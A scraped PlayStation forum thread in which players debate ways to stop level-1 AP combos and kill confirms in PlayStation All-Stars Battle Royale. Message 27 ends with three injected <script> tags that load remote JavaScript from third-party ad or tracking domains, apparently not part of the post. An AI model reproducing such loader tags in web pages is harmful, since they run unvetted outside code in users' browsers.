Reply
First Son
Registered: 02/17/2013
Offline
17 posts
 

Re: My Idea on how to stop AP Combos.

Feb 22, 2013

loklyfatty30 wrote:

Thank you, see. This is how we should talk on the forums instead of yelling and arguing about KCs. I did not complain nothing about KCs, all i said was I dont like em. Im done. omg.


Yelling? Dude I don't think it's possible to yell at someone on a forum. I wasn't arguing about KCs either. I just compared the complaining about KCs to your idea because they are both ridiculous.

 

And the only way we should talk on forums is about how people's ideas are great? We can't have a disagreement on anything? So if I go and say we should nerf Sir Daniel, everyone would be supporting me?

Message 21 of 29 (89 Views)
Reply
0 Likes
Survivor
Registered: 01/23/2013
Offline
2133 posts
 

Re: My Idea on how to stop AP Combos.

Feb 22, 2013
HeroicHamster25: "The game isnt flawed with ap combos and kc they were installed on purpose to give it more in depth competetive play. If you can't grasp the fact that its working as properly and you just suck at it continue with your delusions. Btw the ap drain system would put heihachi and sweet tooth into s tier considering they always have lvl 1 primed for use so they would technically be untouchable by supers or combos."

Sorry I disagree, confirms by no means add any depth, it is rather counter intuitive to depth. Why would anyone delve further into the mysteries of a character when they could just KC instead?
Message 22 of 29 (84 Views)
Reply
0 Likes
Fender Bender
Registered: 01/10/2009
Offline
2538 posts
 

Re: My Idea on how to stop AP Combos.

Feb 22, 2013

HeroicHamster25 wrote:

 Btw the ap drain system would put heihachi and sweet tooth into s tier considering they always have lvl 1 primed for use so they would technically be untouchable by supers or combos.

Maybe make it so it drains a flat amount of AP from everyone? 150 AP? Idk, but the idea is solid and the AP cost would make you think twice. Do I want out of this combo that bad?

Message 23 of 29 (80 Views)
Reply
0 Likes
Fender Bender
Registered: 01/10/2009
Offline
2538 posts
 

Re: My Idea on how to stop AP Combos.

Feb 22, 2013

I will also add that the OP did not bring up kill confirms. He brought up a combo break system for when someone is attempting an AP burst combo. Lets try to stay on topic

Message 24 of 29 (79 Views)
Reply
0 Likes
Sackboy
Registered: 08/11/2012
Offline
464 posts
 

Re: My Idea on how to stop AP Combos.

Feb 22, 2013

That wouldn't quite work. Pros would be at it forever and characters who rely on a single button, like Kratos or Raiden, would suck. A lot. 

 

I think that doing it like Persona 4 Arena would work. Give everyone a Burst meter. The Burst would allow you to stop someone's combo and send 'em flyin' like they got hit with the fish item. You can only do it when the meter's full and the meter takes a minute or so to refill, though it starts full in the beginning of the match.

Message 25 of 29 (77 Views)
Reply
0 Likes
First Son
Registered: 02/17/2013
Offline
17 posts
 

Re: My Idea on how to stop AP Combos.

Feb 22, 2013

TrashCrap wrote:

I will also add that the OP did not bring up kill confirms. He brought up a combo break system for when someone is attempting an AP burst combo. Lets try to stay on topic


False....


loklyfatty30 wrote:

My Idea to stop AP Combos.

 

Okay, so I have stopped playing All Stars because I am tired of the LEVEL 1 AP COMBOS. The combo should be able to be stopped. So I thought of a solution to fix the combos.

 

When you are being combo'd, you should be able to stop the combo like in other fighting games. To stop the combo, all you have to do is press the button corresponding to the attack that the enemy just used. For example.

 

Kat's Lock Combo thing: Down Triangle into SQUARE.

 

If you press Square the second your opponent hits you, you will stop the combo. Ending with a burst or something. The whole combo will be stopped.

 

I personally think this is a good solution to those combos because,

1. It will increase the competitiveness in All-Stars.

2. Stops Kill/Hit Confirms.

3. Forces the player to stop spamming the same combos.

4. Makes the player learn more of the characters.

 

I think I'm done. Thanks. Bye.


Message 26 of 29 (73 Views)
Reply
0 Likes
Gaming Beast
Registered: 11/22/2012
Offline
2167 posts
 

Re: My Idea on how to stop AP Combos.

Feb 22, 2013

vizionary2012 wrote:
HeroicHamster25: "The game isnt flawed with ap combos and kc they were installed on purpose to give it more in depth competetive play. If you can't grasp the fact that its working as properly and you just suck at it continue with your delusions. Btw the ap drain system would put heihachi and sweet tooth into s tier considering they always have lvl 1 primed for use so they would technically be untouchable by supers or combos."

Sorry I disagree, confirms by no means add any depth, it is rather counter intuitive to depth. Why would anyone delve further into the mysteries of a character when they could just KC instead?
Because high level players know how to get around KCs and try very hard to not get hit by them, making mindgames that much more important. Against people who don't KC the game is ridiculously easy since all you need to do is avoid raw supers. Someone who does use KCs however makes me have to watch out for both combo starters and raw supers. However raw supers imply taking a risk, but going for combo starters implies being predictable. Both carry a strong risk/reward factor and just having both options allows for the mix up and ensuing mindgames. With someone who just raw supers there's no guesswork. You just stay out of super range then react to it when they throw it out. It's easy as hell to bait out raw supers from someone who won't KC too.








shadowfan40 wrote:

That wouldn't quite work. Pros would be at it forever and characters who rely on a single button, like Kratos or Raiden, would suck. A lot. 

 

I think that doing it like Persona 4 Arena would work. Give everyone a Burst meter. The Burst would allow you to stop someone's combo and send 'em flyin' like they got hit with the fish item. You can only do it when the meter's full and the meter takes a minute or so to refill, though it starts full in the beginning of the match.


That's not a bad idea either, although I prefer tying it into AP meter myself. Then again tying it into AP makes characters that rely on levels 2/3 worse.

The Fro never sleeps.png


 

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 27 of 29 (63 Views)
First Son
Registered: 01/04/2013
Offline
22 posts
 

Re: My Idea on how to stop AP Combos.

Feb 25, 2013

I personally think this is like only way to stop the confirms and stuff. Cause like this game is horrible, and I don't think Santa Monica will try to fix it. I dont think they are going to do anything. This game has way too many problems, it was not thought about correctly.

Message 28 of 29 (46 Views)
Reply
0 Likes
I Only Post Everything
Registered: 04/28/2009
Offline
955 posts
 

Re: My Idea on how to stop AP Combos.

Feb 25, 2013

Trying playing me as nariko in a 1v1 and see if u can kill me with a level 1 in any way that isnt a confirm.... 

 



Check out my [Moveset Creation Guide] ,my [PSASBR Wishlist]
...and my Movesets!

Message 29 of 29 (41 Views)
Reply
0 Likes